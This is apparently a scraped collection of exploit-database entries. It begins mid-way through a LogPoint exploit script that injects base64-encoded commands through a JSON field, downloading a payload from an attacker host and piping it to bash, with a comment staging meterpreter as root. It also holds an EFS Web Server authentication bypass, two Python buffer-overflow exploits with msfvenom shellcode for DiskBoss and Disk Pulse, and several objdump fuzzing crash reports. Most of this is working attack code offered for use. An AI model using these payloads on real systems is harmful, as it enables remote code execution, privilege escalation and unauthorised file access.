# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
# it downloads a third stage executed as root

import time
import zmq
import sys
import json
import random
import string
import base64

ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'

def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504"%LOGPOINT_IP)
    sock.send('crash')

crash()
time.sleep(1)

context = zmq.Context()

sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504"%LOGPOINT_IP)

name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))

cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')

exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)

tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()

time.sleep(30)

# cleaning
tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
HireHackking 
# Exploit Title: EFS Web Server 7.2 Authentication Bypass
# Date: 11-06-2017
# Software Link: http://www.sharing-file.com/efssetup.exe
# Software Version : 7.2
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/


######## Description ########
<!--
    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs.They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.
-->

######## Video PoC and Article ########

https://www.youtube.com/watch?v=XlTH7Fm1m1w
http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/



######## Attact Description  ########
<!--

 Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe.

==>START<==
Any visitor..

We can Bypass the Login Screen by just Change the URL and Browse the
Drives.
bingoo...
-->

######## Proof of Concept ########

When we visit the EFS web server its prompt for login, now attacker just
change url to below.
Exploit....

http://192.168.1.14/disk_c/

in this case change drvie by just change /disk_c to /disk_<Drive latter>
example. /disk_d , /disk_f etc

=============================================
NOTE :: ::
Now We have Permission to View Drives and Folder and Download Files. in
Diffrent Drives or folder.
============================================

 _____ ___  _   _ _   _ ___ ____
|_   _/ _ \| | | | | | |_ _|  _ \
  | || | | | | | | |_| || || | | |
  | || |_| | |_| |  _  || || |_| |
  |_| \___/ \___/|_| |_|___|____/

Touhid Shaikh.......
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title:  DiskBoss v8.0.16 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
# Vendor Homepage:    http://www.disksorter.com/    
# Version: 8.0.16
# Software Link:      http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
#
# Only difference between this one and 42157 is that EBX is used
#
#  Note: No typos!!11!
#
##############################################################################

a = open("exploit.txt", "w")

# Message=  0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!

badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

llamaleftovers = (
    "\x53"  # push EBX
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
    )

junk = "\x53\x5b" * 119 + "\x53"

data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf

a.write(data)
a.close()
HireHackking 
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580

I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.

Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.

The command I used was `objdump -D <file>`.

Let me know if there is any additional information I can provide.

--

Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min
Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt

Error in "disassemble_bytes": heap-buffer-overflow
  in disassemble_bytes at binutils/objdump.c:1993
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993)
  in disassemble_section at binutils/objdump.c:2309
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
  in bfd_map_over_sections at bfd/section.c:1395
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
  in disassemble_data at binutils/objdump.c:2445
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
  in dump_bfd at binutils/objdump.c:3547
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min
Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt

Error in "disassemble_bytes": heap-buffer-overflow
  in disassemble_bytes at binutils/objdump.c:1932
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932)
  in disassemble_section at binutils/objdump.c:2309
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
  in bfd_map_over_sections at bfd/section.c:1395
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
  in disassemble_data at binutils/objdump.c:2445
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
  in dump_bfd at binutils/objdump.c:3547
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min
Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt

Error in "disassemble_bytes": heap-buffer-overflow
  in disassemble_bytes at binutils/objdump.c:1926
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926)
  in disassemble_section at binutils/objdump.c:2309
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
  in bfd_map_over_sections at bfd/section.c:1395
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
  in disassemble_data at binutils/objdump.c:2445
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
  in dump_bfd at binutils/objdump.c:3547
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)


Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.


Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42199.zip
HireHackking 
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582

I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.

Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.

The command I used was `objdump -D <file>`.

Let me know if there is any additional information I can provide.

--

Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min
Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt

Error in "ieee_object_p": stack-buffer-overflow
  in ieee_object_p at bfd/ieee.c:1985
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985)
  in bfd_check_format_matches at bfd/format.c:311
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
  in display_object_bfd at binutils/objdump.c:3602
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
  in display_any_bfd at binutils/objdump.c:3693
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42202.zip
HireHackking 
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581

I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.

Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.

The command I used was `objdump -D <file>`.

Let me know if there is any additional information I can provide.

--

Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min
Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt

Error in "bfd_get_string": stack-buffer-overflow
  in bfd_get_string at bfd/ieee.c:198
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198)
  in read_id at bfd/ieee.c:227
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227)
  in ieee_object_p at bfd/ieee.c:1907
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907)
  in bfd_check_format_matches at bfd/format.c:311
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
  in display_object_bfd at binutils/objdump.c:3602
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
  in display_any_bfd at binutils/objdump.c:3693
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42200.zip
HireHackking 
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586

I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.

Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.

The command I used was `objdump -D <file>`.

Let me know if there is any additional information I can provide.

--

Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min
Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt

Error in "decode_pseudodbg_assert_0": global-buffer-overflow
  in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604)
  in _print_insn_bfin at opcodes/bfin-dis.c:4760
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
  in print_insn_bfin at opcodes/bfin-dis.c:4778
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
  in disassemble_bytes at binutils/objdump.c:1864
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
  in disassemble_section at binutils/objdump.c:2309
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
  in bfd_map_over_sections at bfd/section.c:1395
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
  in disassemble_data at binutils/objdump.c:2445
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
  in dump_bfd at binutils/objdump.c:3547
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min
Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt

Error in "decode_pseudodbg_assert_0": global-buffer-overflow
  in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596)
  in _print_insn_bfin at opcodes/bfin-dis.c:4760
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
  in print_insn_bfin at opcodes/bfin-dis.c:4778
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
  in disassemble_bytes at binutils/objdump.c:1864
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
  in disassemble_section at binutils/objdump.c:2309
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
  in bfd_map_over_sections at bfd/section.c:1395
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
  in disassemble_data at binutils/objdump.c:2445
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
  in dump_bfd at binutils/objdump.c:3547
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
  in display_file at binutils/objdump.c:3714
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
  in main at binutils/objdump.c:4016
    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)

Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42201.zip
HireHackking 
#!/usr/bin/python

###############################################################################
# Exploit Title:        Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date:                 12-06-2017
# Exploit Author:       abatchy17 -- @abatchy17
# Vulnerable Software:  Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage:      http://www.diskpulse.com/  
# Version:              9.7.14
# Software Link:        http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On:            Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
#   1. Under Directories, click the plus sign
#   2. Paste content of exploit.txt in Add Directory textbox.
#
#       <--- Marry and reproduce --->
#
##############################################################################

a = open("exploit.txt", "w")

badchars = "\x0a\x0d\x2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf =  ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)

jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)

llamaleftovers = (
    "\x55"  # push EBP
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBP + 0x200
    "\x40"  # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
    )

junk = "\x55" + "\x53\x5b" * 107

data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()